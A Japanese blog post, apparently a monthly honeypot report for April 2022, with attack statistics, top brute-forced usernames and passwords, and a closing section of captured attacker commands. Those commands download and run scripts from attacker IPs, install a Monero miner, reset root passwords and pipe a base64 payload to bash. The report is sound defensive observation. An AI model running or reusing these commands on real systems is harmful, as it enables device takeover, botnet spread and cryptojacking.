Midnight Monologues

日々勉強したことを書いてきます

ハニーポット運用(月次報告:2022年4月)

4月のイベント

1.T-Potのバージョンアップ

T-Potを22.04.0にバージョンアップした。ネットワークインタフェース名がenv =>ethへ変更になるのでinterfacesファイルの書き換えが必要だった。待望のリアルタイムのアクセス情報の可視化が追加されており、満足度の高いものだった。

2.フィッシング詐欺の啓蒙番組をみる

TVのバラエティー番組にてフィッシング詐欺の特集をみた。 news.mynavi.jp

TV番組を観た感想は以下の通り。
・クレカの明細は毎月必ず確認する。(不正利用の検知、チャージバックはお店側にも迷惑がかかるので注意)
・フィッシングサイトは見分けようとしない。(ホモグラフ攻撃のようにアラビア文字キリル文字は見分けがつかない)
・中国のブラックマーケットは怖い。


T-Potにて1か月運用した結果を記載する。

今月のChangelog

 更新無し。

前提条件

運用日時:2022年4月1日-2022年4月30日
運用期間:31日

結果

①各ハニーポットで検知したAttack件数
  • T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No ハニーポット 件数 先月比
1 Cowrie 1,652,917 86,655
2 Honeytrap 800,414 38,616
3 Heralding 676,881 ▲10,710
4 Dionaea 343,725 ▲37,137
5 Ddospot 231,139 -
6 Mailoney 114,310 98,995
7 Rdpy 30,951 ▲36,823
8 Adbhoney 12,612 ▲4,235
9 Tanner 5,100 219
10 Ciscoasa 2,774 ▲15,658
11 ConPot 2,277 209
12 CitrixHoneypot 1,787 ▲232
13 Redishoneypot 1,547 -
14 Medpot 957 748
15 ElasticPot 764 ▲107
16 Dicompot 103 ▲67
17 Ipphoney 83 -
18 Honeysap 2 ▲11
  • Result
    • T-Potのバージョンアップに伴い、Ddospot/Redishoneypot/Ipphoneyが追加。
    • Mailoneyへのアクセスが増加している傾向あり。

②攻撃元の国名と件数(Top 20)
No 攻撃元の国名 件数 先月順位
1 Netherlands 631,549 2(↑)
2 United States 555,685 4(↑)
3 Russia 519,875 1(↓)
4 China 432,980 3(↓)
5 Japan 265,258 5(→)
6 Brazil 145,960 10(↑)
7 Germany 98,820 11(↑)
8 Singapore 90,026 7(↓)
9 India 88,817 6(↓)
10 Bangladesh 86,297 圏外(↑)
11 Vietnam 75,141 8(↓)
12 Hong Kong 50,530 12(→)
13 Indonesia 50,382 14(↑)
14 United Kingdom 46,986 13(↓)
15 France 44,944 圏外(↑)
16 South Korea 38,458 16(→)
17 Mexico 35,058 15(↓)
18 Sweden 26,740 17(↓)
19 Latvia 25,975 18(↓)
20 Canada 24,208 圏外(↑)
  • Result
    • United Statesのアクセスが増加。Russiaは少し落ち着いている。
    • 日本国内からのアクセスも前月に引き続き多い。

③検知したCVEの脆弱性と件数
  • Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No CVE ID Count
1 CVE-2020-11899 162,867
2 CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 29
3 CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 6
4 CVE-2020-11910 5
  • Result

④よく攻撃されるユーザ名
  • ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No ユーザ名 件数
1 root 99,949
2 sa 10,898
3 admin 5,513
4 nproc 5,445
5 user 4,125
6 (empty) 1,867
7 test 1,294
8 22 1,205
9 postgres 1,040
10 !root 612
11 2Wire 607
12 ubuntu 569
13 support 489
14 oracle 436
15 guest 364
16 adm 353
17 git 345
18 ftp 328
19 666666 312
20 blank 312
21 debug 311
22 unknown 305
23 0 304
24 $ALOC$ 303
25 www 276
26 mysql 271
27 administrator 257
28 web 242
29 testuser 232
30 anonymous 224
31 server 218
32 ftpuser 216
33 www-data 203
34 Admin 199
35 data 186
36 db 184
37 user123 174
38 tomcat 170
39 ansible 166
40 wwwroot 166
41 deploy 162
42 pi 160
43 ubnt 157
44 backup 144
45 dev 143
46 minecraft 124
47 hadoop 116
48 system 107
49 user2 105
50 jenkins 98
  • Result
    • 特記事項無し。

⑤よく攻撃されるパスワード
  • パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No パスワード 件数
1 admin 17,397
2 123456 9,081
3 nproc 5,445
4 (empty) 3,743
5 1 2,681
6 password 1,445
7 123 1,070
8 blank 919
9 12345678 913
10 12345 841
11 root 748
12 1234 670
13 0 667
14 user 577
15 test 527
16 support 424
17 666666 415
18 ubnt 410
19 123456789 396
20 00000000 362
21 master 359
22 1qaz2wsx 346
23 alpine 346
24 backup 325
25 hi3518 318
26 1234567 311
27 unknown 308
28 synnet 305
29 !ishtar 303
30 10023 282
31 1234567890 252
32 admin123 230
33 123123 227
34 1q2w3e4r 224
35 abc123 223
36 qwerty 220
37 111111 218
38 ubuntu 183
39 _Cisco 182
40 123qwe 163
41 P@ssw0rd 154
42 !QAZ2wsx 149
43 1qaz@WSX 141
44 postgres 139
45 12 136
46 Passw0rd 133
47 pass 133
48 testuser 132
49 system 131
50 iloveyou 130
  • Result
    • 特記事項無し。

⑥今月のマスオさんとZmap
  • massscanの観測結果は以下の通り。

  • Zmapの観測結果は以下の通り。

  • Result

    • 特記事項は無し。

最後に

  • フィッシングサイトのホモグラフ攻撃は巧妙で見分けが全くつかないのが、驚きだった。フィッシングサイトは見分けようとせずに騙されるものとして扱う必要があることが改めて理解できる内容だった。
  • SnOoPy.sh(スヌーピー)やSaitama.sh(ワンパンマンのサイタマ?)など海外のハッカーはアニメや漫画を元にスクリプト命名する場合も多いようだ。
◆shファイルに関するアクセス
#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://182.52.51.239/scripts/23s; curl -O http://182.52.51.239/scripts/23s; chmod +x 23s; ./23s; wget http://182.52.51.239/scripts/23; curl -O http://182.52.51.239/scripts/23; chmod +x 23; ./23; rm -rf 23.sh; ,
cd /data/local/tmp/; busybox wget http://104.249.173.103/w.sh; sh w.sh; curl http://104.249.173.103/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://136.144.41.60/w.sh; sh w.sh; curl http://136.144.41.60/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://140.238.96.175/w.sh; sh w.sh; curl http://140.238.96.175/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://141.95.153.160/w.sh; sh w.sh; curl http://141.95.153.160/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://159.65.25.30/w.sh; sh w.sh; curl http://159.65.25.30/w.sh; sh w.sh,
cd /data/local/tmp/; busybox wget http://194.31.98.171/w.sh; sh w.sh; curl http://194.31.98.171/c.sh -O c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://194.31.98.171/w.sh; sh w.sh; curl http://194.31.98.171/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://194.31.98.191/w.sh; sh w.sh; curl http://194.31.98.191/c.sh -O c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://194.31.98.191/w.sh; sh w.sh; curl http://194.31.98.191/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://194.31.98.248/w.sh; sh w.sh; curl http://194.31.98.248/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://2.56.56.94/w.sh; sh w.sh; curl http://2.56.56.94/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://205.185.115.245/w.sh; sh w.sh; curl http://205.185.115.245/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://205.185.116.110/w.sh; sh w.sh; curl http://205.185.116.110/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://209.141.34.115/w.sh; sh w.sh; curl http://209.141.34.115/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://23.94.22.13/w.sh; sh w.sh; curl http://23.94.22.13/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://23.95.0.211/w.sh; sh w.sh; curl http://23.95.0.211/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://23.95.225.102/bins/w.sh; sh w.sh; curl http://23.95.225.102/bins/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://31.210.20.111/w.sh; sh w.sh android.exploit; curl http://31.210.20.111/c.sh; sh c.sh android.exploit,
cd /data/local/tmp/; busybox wget http://31.210.20.111/w.sh; sh w.sh android; curl http://31.210.20.111/c.sh; sh c.sh android,
cd /data/local/tmp/; busybox wget http://31.210.20.78/w.sh; sh w.sh; curl http://31.210.20.78/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://37.0.11.130/w.sh; sh w.sh; curl http://37.0.11.130/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://37.0.11.152/w.sh; sh w.sh; curl http://37.0.11.152/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://45.148.10.243/bins.sh; sh bins.sh; curl http://45.148.10.243/bins.sh; sh bins.sh,
cd /data/local/tmp/; busybox wget http://45.61.187.136/w.sh; sh w.sh; curl http://45.61.187.136/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://45.95.169.117/w.sh; sh w.sh; curl http://45.95.169.117/c.sh; sh c.sh,
cd /data/local/tmp/; busybox wget http://securityc.co.uk/Gummybins.sh; sh bins.sh; curl http://securityc.co.uk/bins.sh; sh bins.sh,
cd /data/local/tmp/; busybox wget http://securityc.co.uk/Gummybins.sh; sh Gummybins.sh; curl http://securityc.co.uk/Gummybins.sh; sh Gummybins.sh,
cd /data/local/tmp/; busybox wget http://securityc.co.uk/SDSckmKXCMkmsakdmcSADAxcACascC/wpijdajcSCSckSKcKMKsakD.sh; sh wpijdajcSCSckSKcKMKsakD.sh; curl http://securityc.co.uk/SDSckmKXCMkmsakdmcSADAxcACascC/wpijdajcSCSckSKcKMKsakD.sh; sh wpijdajcSCSckSKcKMKsakD.sh,
cd /data/local/tmp/; rm -rf bwget.sh wget.sh bcurl.sh curl.sh; busybox wget http://45.148.10.182/bwget.sh; sh bwget.sh || wget http://45.148.10.182/wget.sh; sh wget.sh || busybox curl http://45.148.10.182/bcurl.sh > bcurl.sh; sh bcurl.sh || curl http://45.148.10.182/curl.sh > curl.sh; sh curl.sh; rm -rf bwget.sh wget.sh bcurl.sh curl.sh,
cd /data/local/tmp/; rm -rf bwget.sh wget.sh bcurl.sh curl.sh; busybox wget http://64.225.71.35/bwget.sh; sh bwget.sh; wget http://64.225.71.35/wget.sh; sh wget.sh; busybox curl http://64.225.71.35/bcurl.sh > bcurl.sh; sh bcurl.sh; curl http://64.225.71.35/curl.sh > curl.sh; sh curl.sh; rm -rf bwget.sh wget.sh bcurl.sh curl.sh,
cd /data/local/tmp/; rm -rf w.sh c.sh; busybox wget http://37.0.11.152/w.sh; sh w.sh; curl http://37.0.11.152/c.sh; sh c.sh,
cd /data/local/tmp/; rm -rf w.sh c.sh; busybox wget http://95.181.161.47/w.sh; sh w.sh; curl http://95.181.161.47/c.sh; sh c.sh,
cd /data/local/tmp/; wget http://194.31.98.169/w.sh; sh w.sh; curl http://194.31.98.169/c.sh; sh c.sh,
cd /data/local/tmp/;busybox wget http://194.31.98.171/w.sh; sh w.sh; curl http://194.31.98.171/c.sh -o c.sh; sh c.sh,
cd /data/local/tmp/;rm *;busybox wget http://176.123.3.216/w.sh; sh w.sh; curl http://176.123.3.216/c.sh -o c.sh; sh c.sh,
cd /data/local/tmp/;rm *;busybox wget http://185.184.71.29/w.sh; sh w.sh; curl http://185.184.71.29/c.sh -o c.sh; sh c.sh,
cd /data/local/tmp;cd /data/local/tmp; wget http://84.21.170.68/update.sh -O enemy; busybox chmod 777 enemy; chmod 777 enemy; ./enemy; busybox wget http://84.21.170.68/update.sh -O; busybox chmod 777 enemy; ./enemy; wget http://198.12.116.254/folder/enemybotarm7 -O enemy; busybox chmod 777 enemy; chmod 777 enemy; ./enemy; busybox wget http://198.12.116.254/folder/enemybotarm7 -O; busybox chmod 777 enemy; ./enemy;wget http://198.12.116.254/folder/enemybotarm6 -O; busybox chmod 777 enemy; ./enemy; wget http://198.12.116.254/folder/ememybotarm4; busybox chmod 777 enemy; chmod 777 enemy; ./enemy; busybox wget http://198.12.116.254/folder/enemybotarm6 -O; busybox chmod 777 enemy; ./enemy; busybox wget http://198.12.116.254/folder/enemybotarm -O enemy; chmod 777 enemy; chmod 777 enemy; ./enemy,
cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://136.144.41.55/Saitama.sh; curl -O http://136.144.41.55/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 136.144.41.55 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 136.144.41.55; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf *,
cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://45.95.55.24/wget.sh; curl -O http://45.95.55.24/wget.sh; chmod 777 wget.sh; sh wget.sh; tftp 45.95.55.24 -c get twget.sh; chmod 777 twget.sh; sh twget.sh; tftp -r twget2.sh -g 45.95.55.24; chmod 777 twget2.sh; sh twget2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.95.55.24 wget1.sh wget1.sh; sh wget1.sh; rm -rf wget.sh twget.sh twget2.sh wget1.sh; rm -rf *,
cd /tmp ; wget 135.125.227.239/ok.sh | curl -O 135.125.227.239/ok.sh ; chmod 777 ok.sh ; ./ok.sh ; rm -rf ok.sh ; history -c,
cd /tmp ; wget 34.125.122.145/ok.sh | curl -O 34.125.122.145/ok.sh ; chmod 777 ok.sh ; ./ok.sh ; rm -rf ok.sh ; history -c,
cd /tmp ; wget 64.31.49.50/ok.sh | curl -O 64.31.49.50/ok.sh ; chmod 777 ok.sh ; ./ok.sh ; rm -rf ok.sh ; history -c,
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://103.161.17.201/Sakura.sh; chmod 777 *; sh Sakura.sh; tftp -g 103.161.17.201 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c,
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://2.56.57.98/hahahaha.sh; chmod 777 *; sh hahahaha.sh; tftp -g 2.56.57.98 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c,
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.60/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 31.210.20.60 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c,
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/onion002; curl -O http://45.90.160.54/onion002; chmod 777 onion002; sh onion002; tftp 45.90.160.54 -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r .sh -g 45.90.160.54; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *,
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/onions1337; curl -O http://45.90.161.105/onions1337; chmod 777 onions1337; sh onions1337; tftp 45.90.161.105 -c get bins.sh; chmod 777 onions1337; sh onions1337; tftp -r .sh -g 45.90.161.105; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh onions1337 .sh .sh; rm -rf *,
cd /tmp; rm -rf wget*; curl -O http://45.95.55.24/wget.sh; wget http://45.95.55.24/wget.sh; chmod 777 wget.sh; ./wget.sh,
cd /tmp; wget http://45.134.225.20/SubZero.sh; sh SubZero.sh,
curl -O 45.90.160.54/start.sh ; wget 45.90.160.54/start.sh ; chmod +777 * ; ./start.sh,
curl -O https://orginal.win/start.sh ; wget https://orginal.win/start.sh ; chmod +777 * ; ./start.sh,
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; wget https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh; sh setup_c3pool_miner.sh 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; echo -e "xox0\nxox0" | passwd,
echo root:dgtij24jtiu3ji4rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA,
echo root:dss4tij24jtiu3ji4rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA,
wget http://179.43.142.11/toto.sh;chmod 777 toto.sh;sh toto.sh,
wget http://204.15.75.59/jwsn.sh,

◆exeファイルに関するアクセス
2019.exe
Install.exe
s.exe

◆他の特徴的なアクセス
echo "root:MYGzbXJAkjjs"|chpasswd|bash,
echo -e "1212\nQW8esGjsEjBz\nQW8esGjsEjBz"|passwd|bash,
echo "1212\nQW8esGjsEjBz\nQW8esGjsEjBz\n"|passwd,
echo "root:9COeXHSjsz8B"|chpasswd|bash,
echo "1234567\noYrm4aO4jsYK\noYrm4aO4jsYK\n"|passwd,
echo -e "1234567\noYrm4aO4jsYK\noYrm4aO4jsYK"|passwd|bash,
echo -e "erica123\nOWfNoFVpjsqF\nOWfNoFVpjsqF"|passwd|bash,
echo "erica123\nOWfNoFVpjsqF\nOWfNoFVpjsqF\n"|passwd,
sleep 15s && cd /var/tmp; echo "IyEvYmluL2Jhc2gKY2QgL3RtcAkKcm0gLXJmIC5zc2gKcm0gLXJmIC5tb3VudGZzCnJtIC1yZiAuWDEzLXVuaXgKcm0gLXJmIC5YMTctdW5peApta2RpciAuWDE3LXVuaXgKY2QgLlgxNy11bml4Cm12IC92YXIvdG1wL2RvdGEudGFyLmd6IGRvdGEudGFyLmd6CnRhciB4ZiBkb3RhLnRhci5negpzbGVlcCAzcyAmJiBjZCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYwpub2h1cCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYy90c20gLXQgMTUwIC1TIDYgLXMgNiAtcCAyMiAtUCAwIC1mIDAgLWsgMSAtbCAxIC1pIDAgL3RtcC91cC50eHQgMTkyLjE2OCA+PiAvZGV2L251bGwgMj4xJgpzbGVlcCA4bSAmJiBub2h1cCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYy90c20gLXQgMTUwIC1TIDYgLXMgNiAtcCAyMiAtUCAwIC1mIDAgLWsgMSAtbCAxIC1pIDAgL3RtcC91cC50eHQgMTcyLjE2ID4+IC9kZXYvbnVsbCAyPjEmCnNsZWVwIDIwbSAmJiBjZCAuLjsgL3RtcC8uWDE3LXVuaXgvLnJzeW5jL2luaXRhbGwgMj4xJgpleGl0IDA=" | base64 --decode | bash,